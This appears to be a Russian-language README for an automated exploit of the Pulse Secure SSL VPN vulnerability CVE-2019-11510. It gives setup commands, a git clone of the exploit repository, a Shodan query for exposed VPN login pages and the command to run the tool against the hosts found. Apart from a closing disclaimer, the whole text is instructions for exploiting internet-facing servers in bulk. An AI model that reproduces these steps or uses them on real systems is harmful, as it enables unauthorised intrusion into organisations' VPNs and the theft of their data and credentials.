
Эксплойт Pulse Secure SSL VPN (CVE-2019-11510), использующий хосты, полученные из Shodan API.
Автоматизированный скрипт для эксплуатации уязвимости Pulse Secure SSL VPN (CVE-2019-11510) с использованием хостов, полученных из API Shodan. Для использования этого скрипта необходимо иметь аккаунт Shodan. Нажмите сюда, если у вас нет аккаунта Shodan.

# CentOS и Fedora
yum install git python3 -y
# Ubuntu и Debian
apt install git python3 python3-pip -y
# FreeBSD
pkg install -y python3 git
python3 -m ensurepip
git clone https://github.com/andripwn/pulse-exploit.git
cd pulse-exploit
pip3 install -r requirements.txt
# API-ключ Shodan (измените в соответствии с вашим ключом)
api_key = ''
# Поисковый запрос Shodan (отредактируйте, но не удаляйте html и port)
search_query = 'html:"/dana/" port:"443"'
python3 pulsexploit.py -t <количество потоков / по умолчанию: 5>
Этот скрипт предназначен только для тестирования на проникновение и исследований в области безопасности; я не несу ответственности, если вы используете его для незаконной деятельности.